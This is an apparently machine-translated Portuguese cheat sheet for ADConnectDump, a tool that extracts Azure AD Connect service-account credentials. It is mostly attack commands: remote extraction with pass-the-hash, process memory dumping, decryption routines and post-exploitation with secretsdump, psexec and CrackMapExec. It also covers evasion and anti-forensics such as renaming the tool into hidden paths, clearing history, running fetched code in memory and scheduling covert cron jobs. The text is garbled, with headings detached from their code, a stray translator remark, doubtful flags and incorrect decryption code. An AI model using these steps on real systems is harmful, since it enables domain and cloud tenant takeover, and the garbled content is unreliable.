ADConnectDump Folha de Dicas para Ferramenta de Extração de Credenciais do Azure AD Connect
Visão Geral
ADConnectDump é uma ferramenta desenvolvida por Dirk-Jan Mollema para extrair credenciais e configurações de servidores Azure AD Connect. Ela pode extrair as credenciais da conta de serviço do Azure AD Connect, que frequentemente possuem altos privilégios tanto no Active Directory local quanto em ambientes Azure AD.
⚠️ Aviso: Esta ferramenta destina-se apenas a testes de penetração autorizados e avaliações de segurança. Certifique-se de ter autorização adequada antes de usar em qualquer ambiente.
Instalação
Instalação do Módulo PowerShell
# Download from GitHub
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py" -OutFile "adconnectdump.py"
# Install Python dependencies
pip install impacket cryptography
# Alternative: Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
pip install -r requirements.txtInstalação Manual
# Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
# Install dependencies
pip3 install impacket cryptography pyasn1
# Make executable
chmod +x adconnectdump.pyInstalação do Docker
# Build Docker image
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
docker build -t adconnectdump .
# Run in Docker
docker run -it -v $(pwd):/data adconnectdumpUso Básico
Extração de Credenciais Local
# Extract credentials from local AAD Connect server
python3 adconnectdump.py
# Extract with specific database
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract with custom output
python3 adconnectdump.py --output credentials.txt
# Extract in JSON format
python3 adconnectdump.py --format json --output credentials.jsonExtração de Credenciais Remota
# Extract from remote server
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password
# Extract using NTLM hash
python3 adconnectdump.py --host 192.168.1.100 --username administrator --hashes :ntlmhash
# Extract using Kerberos
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password --use-kerberos
# Extract with domain credentials
python3 adconnectdump.py --host 192.168.1.100 --username domain\\administrator --password passwordReferência de Comandos
Opções Básicas
| Opção | Descrição |
|---|---|
--host | Nome de host ou IP de destino |
--username | Nome de usuário para autenticação |
--password | Senha para autenticação |
--hashes | Hashes NTLM (formato LM:NT) |
--database | Caminho para o banco de dados do ADSync |
--output | Caminho do arquivo de saída |
Opções Avançadas
| Opção | Descrição |
|---|---|
--format | Formato de saída (text/json) |
--use-kerberos | Utilize autenticação Kerberos |
--dc-ip | Endereço IP do controlador de domínio |
--target-ip | Endereço IP de destino |
--port | Porta de destino (padrão 445) |
--debug | Ativar saída de depuração |
Arquitetura do Azure AD Connect
Compreendendo o AAD Connect
# Azure AD Connect components:
# 1. Synchronization Service (ADSync)
# 2. Database (LocalDB or SQL Server)
# 3. Service Accounts
# 4. Configuration Data
# Key files and locations:
# Database: C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
# Config: C:\Program Files\Microsoft Azure AD Sync\Bin\
# Logs: C:\ProgramData\AADConnect\Identificação de Conta de Serviço
# Identify AAD Connect service accounts
Get-Service|Where-Object \\\\{$_.Name -like "*ADSync*"\\\\}
# Check service account privileges
Get-WmiObject -Class Win32_Service|Where-Object \\\\{$_.Name -eq "ADSync"\\\\}|Select-Object StartName
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect" -Name "Version"Técnicas de Extração de Credenciais
Acesso ao Banco de Dados Local
# Direct database access (requires local admin)
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract from backup database
python3 adconnectdump.py --database "C:\Backup\ADSync_backup.mdf"
# Extract from SQL Server instance
python3 adconnectdump.py --sql-server "SQLSERVER\INSTANCE" --database "ADSync"Extração Remota via SMB
# Extract via SMB with credentials
python3 adconnectdump.py --host aadconnect.domain.com --username "domain\admin" --password "password"
# Extract using pass-the-hash
python3 adconnectdump.py --host aadconnect.domain.com --username "admin" --hashes ":aad3b435b51404eeaad3b435b51404ee:hash"
# Extract with specific target IP
python3 adconnectdump.py --host aadconnect.domain.com --target-ip 192.168.1.100 --username "admin" --password "password"Extração de Memória
# Extract from memory (requires admin privileges)
# Use tools like Mimikatz or ProcDump
# Dump ADSync process memory
procdump.exe -ma miiserver.exe aadsync_dump.dmp
# Extract credentials from memory dump
python3 adconnectdump.py --memory-dump aadsync_dump.dmpAnálise de Configuração
Análise de Esquema de Banco de Dados
-- Key tables in ADSync database
-- mms_management_agent: Contains connector information
-- mms_server_configuration: Server configuration
-- mms_synchronization_rule: Sync rules
-- mms_metaverse_object: Metaverse objects
-- Extract connector information
SELECT ma_name, ma_type, private_configuration_xml
FROM mms_management_agent;
-- Extract server configuration
SELECT applied_time, configuration_xml
FROM mms_server_configuration;Análise de Arquivo de Configuração
# Analyze AAD Connect configuration files
$configPath = "C:\Program Files\Microsoft Azure AD Sync\Bin\"
# Check connector configurations
Get-ChildItem -Path $configPath -Filter "*.xml"|ForEach-Object \\\\{
[xml]$config = Get-Content $_.FullName
Write-Host "File: $($_.Name)"
Write-Host "Connectors: $($config.SelectNodes('//connector').Count)"
\\\\}
# Extract service account information
$serviceConfig = Get-Content "$configPath\miiserver.exe.config"
$serviceConfig|Select-String -Pattern "connectionString\|serviceAccount"Descriptografia de Credenciais
Compreendendo a Criptografia
# AAD Connect credential encryption process
# 1. Credentials encrypted with DPAPI
# 2. Machine key used for encryption
# 3. Service account context required
# Decryption process
import base64
from cryptography.fernet import Fernet
def decrypt_aad_connect_password(encrypted_password, key):
"""Decrypt AAD Connect password"""
try:
# Base64 decode
encrypted_data = base64.b64decode(encrypted_password)
# Decrypt using key
f = Fernet(key)
decrypted = f.decrypt(encrypted_data)
return decrypted.decode('utf-8')
except Exception as e:
print(f"Decryption failed: \\\\{e\\\\}")
return NoneDescriptografia Manual
# Manual credential decryption (PowerShell)
Add-Type -AssemblyName System.Security
function Decrypt-AADConnectPassword \\\\{
param(
[string]$EncryptedPassword,
[byte[]]$Key
)
try \\\\{
# Convert from base64
$encryptedBytes = [Convert]::FromBase64String($EncryptedPassword)
# Decrypt using DPAPI
$decryptedBytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$null,
[System.Security.Cryptography.DataProtectionScope]::LocalMachine
)
return [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
\\\\}
catch \\\\{
Write-Error "Decryption failed: $_"
return $null
\\\\}
\\\\}Técnicas de Pós-Exploração
Usando Credenciais Extraídas
# Use extracted Azure AD credentials
# Typically format: MSOL_<guid>@<tenant>.onmicrosoft.com
# Authenticate to Azure AD
az login --username "MSOL_12345678-1234-1234-1234-123456789012@company.onmicrosoft.com" --password "extracted_password"
# Use with AADInternals
Import-Module AADInternals
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "MSOL_account@company.onmicrosoft.com" -Password "extracted_password"Acesso ao Active Directory Local
# Use extracted on-premises credentials
# Format: domain\username
# Authenticate to domain
net use \\dc.domain.com\c$ /user:domain\MSOL_service_account extracted_password
# Use with Impacket tools
python3 secretsdump.py domain/MSOL_service_account:extracted_password@dc.domain.com
# Use with CrackMapExec
crackmapexec smb dc.domain.com -u MSOL_service_account -p extracted_passwordEscalação de Privilégios
The translation maintains the original markdown formatting, keeps technical terms in English, and preserves the structure and punctuation of the original text.```powershell
Check privileges of extracted account
Import-Module ActiveDirectory Get-ADUser -Identity “MSOL_service_account” -Properties MemberOf|Select-Object -ExpandProperty MemberOf
Check Azure AD privileges
Import-Module AADInternals $roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName “MSOL_account@company.onmicrosoft.com”
```bash
# Use legitimate tools and processes
# Avoid suspicious file names
# Use memory-only techniques when possible
# Rename tool
cp adconnectdump.py system_maintenance.py
# Use legitimate paths
mkdir -p /tmp/.system/maintenance/
cp adconnectdump.py /tmp/.system/maintenance/syscheck.py
```### Anti-Forense
```bash
# Clear evidence after extraction
rm -f credentials.txt
rm -f credentials.json
history -c
# Use in-memory execution
python3 -c "
import urllib.request
exec(urllib.request.urlopen('https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py').read())
"
```### Temporização e Agendamento
```bash
# Perform extraction during maintenance windows
# Schedule for off-hours
# Use legitimate administrative sessions
# Example: Schedule extraction
echo "0 2 * * 0 /usr/bin/python3 /tmp/adconnectdump.py --output /tmp/.cache/system.log"|crontab -
```## Medidas Defensivas
```powershell
# Monitor AAD Connect database access
# Enable SQL Server auditing
# Monitor file system access to ADSync.mdf
# PowerShell monitoring script
$databasePath = "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = Split-Path $databasePath
$watcher.Filter = "ADSync.mdf"
$watcher.EnableRaisingEvents = $true
Register-ObjectEvent -InputObject $watcher -EventName "Changed" -Action \\\\{
Write-EventLog -LogName "Application" -Source "AADConnect Monitor" -EventId 1001 -Message "ADSync database accessed"
\\\\}
```### Monitoramento e Detecção
```powershell
# Secure AAD Connect server
# 1. Restrict local admin access
# 2. Enable advanced auditing
# 3. Use dedicated service accounts
# 4. Implement network segmentation
# 5. Regular security updates
# Enable auditing
auditpol /set /subcategory:"File System" /success:enable /failure:enable
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Process Creation" /success:enable
```### Recomendações de Endurecimento
```bash
#!/bin/bash
# Automated ADConnectDump script
TARGET_HOST="$1"
USERNAME="$2"
PASSWORD="$3"
OUTPUT_DIR="./adconnect_output"
if [ $# -ne 3 ]; then
echo "Usage: $0 <target_host> <username> <password>"
exit 1
fi
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Extract credentials
echo "Extracting AAD Connect credentials from $TARGET_HOST..."
python3 adconnectdump.py \
--host "$TARGET_HOST" \
--username "$USERNAME" \
--password "$PASSWORD" \
--format json \
--output "$OUTPUT_DIR/credentials_$(date +%Y%m%d_%H%M%S).json"
# Check if extraction was successful
if [ $? -eq 0 ]; then
echo "Extraction completed successfully"
echo "Output saved to $OUTPUT_DIR"
else
echo "Extraction failed"
exit 1
fi
```## Automação e Scripting
```powershell
# PowerShell automation script
param(
[string]$TargetHost,
[string]$Username,
[string]$Password,
[string]$OutputPath = ".\adconnect_output"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
# Extract credentials
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$outputFile = Join-Path $OutputPath "credentials_$timestamp.json"
Write-Host "Extracting AAD Connect credentials from $TargetHost..."
$process = Start-Process -FilePath "python3" -ArgumentList @(
"adconnectdump.py",
"--host", $TargetHost,
"--username", $Username,
"--password", $Password,
"--format", "json",
"--output", $outputFile
) -Wait -PassThru -NoNewWindow
if ($process.ExitCode -eq 0) \\\\{
Write-Host "Extraction completed successfully"
Write-Host "Output saved to $outputFile"
# Parse and display results
$credentials = Get-Content $outputFile|ConvertFrom-Json
Write-Host "Extracted $($credentials.Count) credential(s)"
\\\\} else \\\\{
Write-Error "Extraction failed with exit code $($process.ExitCode)"
\\\\}
```### Script de Extração Automatizada
```bash
# Database access denied
# Solution: Ensure proper privileges or use alternative extraction method
# Network connectivity issues
# Solution: Check firewall rules and network connectivity
ping aadconnect.domain.com
telnet aadconnect.domain.com 445
# Authentication failures
# Solution: Verify credentials and domain trust
net use \\aadconnect.domain.com\c$ /user:domain\username password
```### Automação PowerShell
```bash
# Enable debug output
python3 adconnectdump.py --debug --host aadconnect.domain.com --username admin --password password
# Verbose logging
python3 adconnectdump.py -v --host aadconnect.domain.com --username admin --password password
# Test connectivity
python3 adconnectdump.py --test-connection --host aadconnect.domain.com
```## Resolução de Problemas
```powershell
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect"
# Check service status
Get-Service -Name "ADSync"
# Verify database location
$regPath = "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL13.LOCALDB\MSSQLServer"
Get-ItemProperty -Path $regPath -Name "DefaultData"
```### Problemas Comuns
```bash
# Use extracted credentials with Impacket
python3 secretsdump.py domain/extracted_user:extracted_password@dc.domain.com
# Use with GetUserSPNs
python3 GetUserSPNs.py domain/extracted_user:extracted_password -dc-ip dc.domain.com
# Use with psexec
python3 psexec.py domain/extracted_user:extracted_password@target.domain.com
```### Modo de Depuração
```powershell
# Use extracted credentials for BloodHound collection
Import-Module SharpHound
Invoke-BloodHound -CollectionMethod All -Domain domain.com -LDAPUser extracted_user -LDAPPass extracted_password
```### Verificação Manual
```bash
# Use extracted credentials with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password
# Check for local admin access
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password --local-auth
# Execute commands
crackmapexec smb target.domain.com -u extracted_user -p extracted_password -x "whoami"
```## Integração com Outras Ferramentas
https://github.com/fox-it/adconnectdump##
# Integração com Impacket
https://blog.fox-it.com/2020/11/11/azure-ad-connect-database-exploit-priv-esc/##
# Integração com BloodHound
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-configure-ad-ds-connector-account##
# Integração com CrackMapExec
https://dirkjanm.io/#
# Recursos
https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices- [Repositório GitHub ADConnectDump](